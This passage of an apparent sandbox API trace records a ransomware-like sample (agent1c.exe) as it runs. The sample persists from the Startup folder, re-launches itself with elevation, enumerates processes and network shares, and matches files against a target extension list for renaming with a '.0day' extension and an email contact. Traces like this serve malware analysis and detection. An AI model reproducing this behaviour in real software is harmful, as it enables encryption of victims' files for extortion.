(lpString="explorer.exe") returned 12 [0274.671] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0274.671] lstrlenW (lpString="dwm.exe") returned 7 [0274.671] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.672] lstrlenW (lpString="svchost.exe") returned 11 [0274.672] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0274.672] lstrlenW (lpString="agent1c.exe") returned 11 [0274.672] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0274.672] lstrlenW (lpString="spoolsv.exe") returned 11 [0274.672] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0274.673] lstrlenW (lpString="reader_sl.exe") returned 13 [0274.673] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0274.673] lstrlenW (lpString="dllhost.exe") returned 11 [0274.673] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0274.673] lstrlenW (lpString="taskhost.exe") returned 12 [0274.673] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.673] lstrlenW (lpString="svchost.exe") returned 11 [0274.674] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0274.674] CloseHandle (hObject=0x388) returned 1 [0274.674] Sleep (dwMilliseconds=0x1f4) Thread: id = 50 os_tid = 0x61c [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4f3258 [0261.997] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x533fd8 [0261.998] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4f32c8 [0261.998] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4f32c8, Size=0x20) returned 0x4d9d50 [0261.998] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4f32c8 [0261.998] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4f32c8, Size=0x20) returned 0x4d9d78 [0261.998] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0261.998] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0261.998] Wow64DisableWow64FsRedirection (in: OldValue=0x21eff28 | out: OldValue=0x21eff28*=0x0) returned 1 [0261.998] lstrlenW (lpString="kernel32.dll") returned 12 [0261.998] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9d50 | out: hHeap=0x4a0000) returned 1 [0261.998] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0261.998] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9d78 | out: hHeap=0x4a0000) returned 1 [0261.998] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x533fd8, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe")) returned 0x67 [0261.999] ShellExecuteExW (pExecInfo=0x21eff34*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe", lpParameters="-a", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) Thread: id = 51 os_tid = 0x620 [0262.001] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4f32e0 [0262.001] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4f32e0, Size=0x20) returned 0x4d9d78 [0262.001] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9d78, Size=0x40) returned 0x4dadf0 [0262.001] GetLogicalDrives () returned 0x4 [0262.001] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x544650 [0262.002] GetComputerNameW (in: lpBuffer=0x544654, nSize=0x22eff6c | out: lpBuffer="XDUWTFONO", nSize=0x22eff6c) returned 1 [0262.002] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1000) returned 0x554658 [0262.002] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x22eff3c | out: lphEnum=0x22eff3c*=0x4da3f8) returned 0x0 [0262.002] WNetEnumResourceW (in: hEnum=0x4da3f8, lpcCount=0x22eff38, lpBuffer=0x554658, lpBufferSize=0x22eff40 | out: lpcCount=0x22eff38, lpBuffer=0x554658, lpBufferSize=0x22eff40) returned 0x103 [0262.002] WNetCloseEnum (hEnum=0x4da3f8) returned 0x0 [0262.002] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x22eff3c | out: lphEnum=0x22eff3c*=0x533c88) returned 0x0 [0265.246] WNetEnumResourceW (in: hEnum=0x533c88, lpcCount=0x22eff38, lpBuffer=0x554658, lpBufferSize=0x22eff40 | out: lpcCount=0x22eff38, lpBuffer=0x554658, lpBufferSize=0x22eff40) returned 0x0 [0265.246] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1000) returned 0x502b00 [0265.246] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x554658, lphEnum=0x22eff10 | out: lphEnum=0x22eff10*=0x3580140) returned 0x0 [0265.432] WNetEnumResourceW (in: hEnum=0x3580140, lpcCount=0x22eff0c, lpBuffer=0x502b00, lpBufferSize=0x22eff14 | out: lpcCount=0x22eff0c, lpBuffer=0x502b00, lpBufferSize=0x22eff14) returned 0x103 [0265.432] WNetCloseEnum (hEnum=0x3580140) returned 0x0 [0265.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1000) returned 0x35a6478 [0265.432] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x554678, lphEnum=0x22eff10 | out: lphEnum=0x22eff10*=0x0) returned 0x4c6 [0265.609] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1000) returned 0x4276000 [0265.609] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x554698, lphEnum=0x22eff10 | out: lphEnum=0x22eff10*=0x0) returned 0x4c6 [0265.609] WNetEnumResourceW (in: hEnum=0x533c88, lpcCount=0x22eff38, lpBuffer=0x554658, lpBufferSize=0x22eff40 | out: lpcCount=0x22eff38, lpBuffer=0x554658, lpBufferSize=0x22eff40) returned 0x103 [0265.609] WNetCloseEnum (hEnum=0x533c88) returned 0x0 [0265.609] GetLogicalDrives () returned 0x4 [0265.609] Sleep (dwMilliseconds=0x64) [0265.785] GetLogicalDrives () returned 0x4 [0265.785] Sleep (dwMilliseconds=0x64) [0265.971] GetLogicalDrives () returned 0x4 [0265.971] Sleep (dwMilliseconds=0x64) [0266.165] GetLogicalDrives () returned 0x4 [0266.165] Sleep (dwMilliseconds=0x64) [0266.407] GetLogicalDrives () returned 0x4 [0266.407] Sleep (dwMilliseconds=0x64) [0266.666] GetLogicalDrives () returned 0x4 [0266.666] Sleep (dwMilliseconds=0x64) [0266.933] GetLogicalDrives () returned 0x4 [0266.933] Sleep (dwMilliseconds=0x64) [0267.326] GetLogicalDrives () returned 0x4 [0267.326] Sleep (dwMilliseconds=0x64) [0267.686] GetLogicalDrives () returned 0x4 [0267.686] Sleep (dwMilliseconds=0x64) [0267.939] GetLogicalDrives () returned 0x4 [0267.939] Sleep (dwMilliseconds=0x64) [0268.514] GetLogicalDrives () returned 0x4 [0268.514] Sleep (dwMilliseconds=0x64) [0268.743] GetLogicalDrives () returned 0x4 [0268.743] Sleep (dwMilliseconds=0x64) [0268.902] GetLogicalDrives () returned 0x4 [0268.903] Sleep (dwMilliseconds=0x64) [0269.057] GetLogicalDrives () returned 0x4 [0269.057] Sleep (dwMilliseconds=0x64) [0269.167] GetLogicalDrives () returned 0x4 [0269.167] Sleep (dwMilliseconds=0x64) [0269.474] GetLogicalDrives () returned 0x4 [0269.474] Sleep (dwMilliseconds=0x64) [0269.783] GetLogicalDrives () returned 0x4 [0269.783] Sleep (dwMilliseconds=0x64) [0269.979] GetLogicalDrives () returned 0x4 [0269.979] Sleep (dwMilliseconds=0x64) [0270.217] GetLogicalDrives () returned 0x4 [0270.217] Sleep (dwMilliseconds=0x64) [0270.375] GetLogicalDrives () returned 0x4 [0270.375] Sleep (dwMilliseconds=0x64) [0270.573] GetLogicalDrives () returned 0x4 [0270.573] Sleep (dwMilliseconds=0x64) [0271.018] GetLogicalDrives () returned 0x4 [0271.018] Sleep (dwMilliseconds=0x64) [0271.285] GetLogicalDrives () returned 0x4 [0271.285] Sleep (dwMilliseconds=0x64) [0271.517] GetLogicalDrives () returned 0x4 [0271.517] Sleep (dwMilliseconds=0x64) [0271.650] GetLogicalDrives () returned 0x4 [0271.651] Sleep (dwMilliseconds=0x64) [0271.814] GetLogicalDrives () returned 0x4 [0271.814] Sleep (dwMilliseconds=0x64) [0271.923] GetLogicalDrives () returned 0x4 [0271.923] Sleep (dwMilliseconds=0x64) [0272.071] GetLogicalDrives () returned 0x4 [0272.071] Sleep (dwMilliseconds=0x64) [0272.202] GetLogicalDrives () returned 0x4 [0272.202] Sleep (dwMilliseconds=0x64) [0272.468] GetLogicalDrives () returned 0x4 [0272.468] Sleep (dwMilliseconds=0x64) [0272.768] GetLogicalDrives () returned 0x4 [0272.768] Sleep (dwMilliseconds=0x64) [0272.970] GetLogicalDrives () returned 0x4 [0272.970] Sleep (dwMilliseconds=0x64) [0273.684] GetLogicalDrives () returned 0x4 [0273.684] Sleep (dwMilliseconds=0x64) [0273.895] GetLogicalDrives () returned 0x4 [0273.895] Sleep (dwMilliseconds=0x64) [0274.143] GetLogicalDrives () returned 0x4 [0274.143] Sleep (dwMilliseconds=0x64) [0274.582] GetLogicalDrives () returned 0x4 [0274.582] Sleep (dwMilliseconds=0x64) [0274.795] GetLogicalDrives () returned 0x4 [0274.795] Sleep (dwMilliseconds=0x64) [0275.085] GetLogicalDrives () returned 0x4 [0275.085] Sleep (dwMilliseconds=0x64) Thread: id = 52 os_tid = 0x624 [0264.992] GetTickCount () returned 0x81cc [0264.992] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x24) returned 0x4dddd0 [0264.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x4dddd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130 [0264.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x4dddd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138 [0265.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x4dddd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0265.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x4dddd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x120 [0265.206] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5331e8 [0265.207] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5331e8, Size=0x20) returned 0x4d9fa8 [0265.207] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5331e8 [0265.207] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5331e8, Size=0x20) returned 0x4d9fd0 [0265.207] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.226] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.226] Wow64DisableWow64FsRedirection (in: OldValue=0x242ff84 | out: OldValue=0x242ff84*=0x0) returned 1 [0265.226] lstrlenW (lpString="kernel32.dll") returned 12 [0265.226] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9fa8 | out: hHeap=0x4a0000) returned 1 [0265.226] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.226] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9fd0 | out: hHeap=0x4a0000) returned 1 [0265.226] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x4dee58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x15c [0265.228] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0265.403] GetTickCount () returned 0x82a6 [0265.403] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0265.564] GetTickCount () returned 0x8342 [0265.564] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0265.779] GetTickCount () returned 0x841d [0265.779] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0265.947] GetTickCount () returned 0x84c8 [0265.947] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0266.165] GetTickCount () returned 0x85a3 [0266.165] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0266.407] GetTickCount () returned 0x868d [0266.407] GetTickCount () returned 0x868d [0266.407] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0266.666] GetTickCount () returned 0x87a5 [0266.666] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0266.933] GetTickCount () returned 0x8880 [0266.933] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0267.325] GetTickCount () returned 0x8a06 [0267.326] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0267.686] GetTickCount () returned 0x8b5d [0267.686] GetTickCount () returned 0x8b5d [0267.686] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0267.939] GetTickCount () returned 0x8c57 [0267.939] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0268.514] GetTickCount () returned 0x8e79 [0268.514] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0268.744] GetTickCount () returned 0x8f53 [0268.744] GetTickCount () returned 0x8f53 [0268.744] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0268.903] GetTickCount () returned 0x8fef [0268.903] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0269.058] GetTickCount () returned 0x907b [0269.058] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0269.168] GetTickCount () returned 0x90e9 [0269.168] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0269.475] GetTickCount () returned 0x9211 [0269.475] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0269.784] GetTickCount () returned 0x9339 [0269.784] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0269.980] GetTickCount () returned 0x93f5 [0269.980] GetTickCount () returned 0x93f5 [0269.980] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0270.217] GetTickCount () returned 0x94df [0270.217] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0270.375] GetTickCount () returned 0x957b [0270.375] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0270.573] GetTickCount () returned 0x9636 [0270.573] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.019] GetTickCount () returned 0x97fa [0271.019] GetTickCount () returned 0x97fa [0271.019] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.285] GetTickCount () returned 0x98f4 [0271.285] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.517] GetTickCount () returned 0x99de [0271.518] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.651] GetTickCount () returned 0x9a5b [0271.651] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.814] GetTickCount () returned 0x9af7 [0271.814] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0271.923] GetTickCount () returned 0x9b64 [0271.923] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0272.071] GetTickCount () returned 0x9bf0 [0272.071] GetTickCount () returned 0x9bf0 [0272.071] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0272.202] GetTickCount () returned 0x9c6d [0272.202] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0272.468] GetTickCount () returned 0x9d67 [0272.468] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0272.765] GetTickCount () returned 0x9e7f [0272.765] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0272.970] GetTickCount () returned 0x9f4a [0272.970] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0273.683] GetTickCount () returned 0xa208 [0273.683] GetTickCount () returned 0xa208 [0273.683] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0273.895] GetTickCount () returned 0xa2e3 [0273.895] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0274.143] GetTickCount () returned 0xa3dc [0274.143] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0274.582] GetTickCount () returned 0xa591 [0274.582] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0274.795] GetTickCount () returned 0xa66b [0274.795] GetTickCount () returned 0xa66b [0274.795] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) returned 0x102 [0275.085] GetTickCount () returned 0xa784 [0275.085] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x64) Thread: id = 53 os_tid = 0x630 Thread: id = 56 os_tid = 0x680 [0265.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x565e50 [0265.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x575e58 [0265.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533410 [0265.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521b30 [0265.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533428 [0265.250] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x3200020 [0265.251] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533440 [0265.251] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533440, Size=0x20) returned 0x4fe718 [0265.251] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533440 [0265.251] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x533440, Size=0x20) returned 0x4fe6f0 [0265.251] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.251] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.251] Wow64DisableWow64FsRedirection (in: OldValue=0x2aaff58 | out: OldValue=0x2aaff58*=0x0) returned 1 [0265.251] lstrlenW (lpString="kernel32.dll") returned 12 [0265.251] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fe718 | out: hHeap=0x4a0000) returned 1 [0265.251] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.251] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fe6f0 | out: hHeap=0x4a0000) returned 1 [0265.251] Sleep (dwMilliseconds=0x64) [0265.403] lstrcmpiW (lpString1=".ini", lpString2=".0day") returned 1 [0265.403] lstrlenW (lpString="desktop.ini") returned 11 [0265.403] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0265.403] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=129) returned 1 [0265.403] CloseHandle (hObject=0x1f8) returned 1 [0265.403] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0265.403] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[my0day@aol.com].0day")) returned 0x26 [0265.404] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.405] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.405] lstrlenW (lpString=".doc") returned 4 [0265.405] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0265.405] lstrlenW (lpString=".docx") returned 5 [0265.405] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0265.405] lstrlenW (lpString=".pdf") returned 4 [0265.405] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0265.405] lstrlenW (lpString=".xls") returned 4 [0265.405] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0265.405] lstrlenW (lpString=".xlsx") returned 5 [0265.405] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0265.405] lstrlenW (lpString=".ppt") returned 4 [0265.405] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0265.405] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.405] lstrlenW (lpString=".zip") returned 4 [0265.405] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0265.405] lstrlenW (lpString=".rar") returned 4 [0265.405] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0265.405] lstrlenW (lpString=".bz2") returned 4 [0265.405] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0265.405] lstrlenW (lpString=".7z") returned 3 [0265.405] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0265.405] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.405] lstrlenW (lpString=".dbf") returned 4 [0265.405] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0265.405] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.405] lstrlenW (lpString=".1cd") returned 4 [0265.405] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0265.405] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.405] lstrlenW (lpString=".jpg") returned 4 [0265.405] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0265.405] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.405] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.406] lstrlenW (lpString=".doc") returned 4 [0265.406] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0265.406] lstrlenW (lpString=".docx") returned 5 [0265.406] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0265.406] lstrlenW (lpString=".pdf") returned 4 [0265.406] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0265.406] lstrlenW (lpString=".xls") returned 4 [0265.406] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0265.406] lstrlenW (lpString=".xlsx") returned 5 [0265.406] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0265.406] lstrlenW (lpString=".ppt") returned 4 [0265.406] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0265.406] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.406] lstrlenW (lpString=".zip") returned 4 [0265.406] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0265.406] lstrlenW (lpString=".rar") returned 4 [0265.406] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0265.406] lstrlenW (lpString=".bz2") returned 4 [0265.406] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0265.406] lstrlenW (lpString=".7z") returned 3 [0265.406] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0265.406] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.406] lstrlenW (lpString=".dbf") returned 4 [0265.406] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0265.406] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.406] lstrlenW (lpString=".1cd") returned 4 [0265.406] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0265.406] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0265.406] lstrlenW (lpString=".jpg") returned 4 [0265.406] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0265.406] lstrcmpiW (lpString1=".LOG", lpString2=".0day") 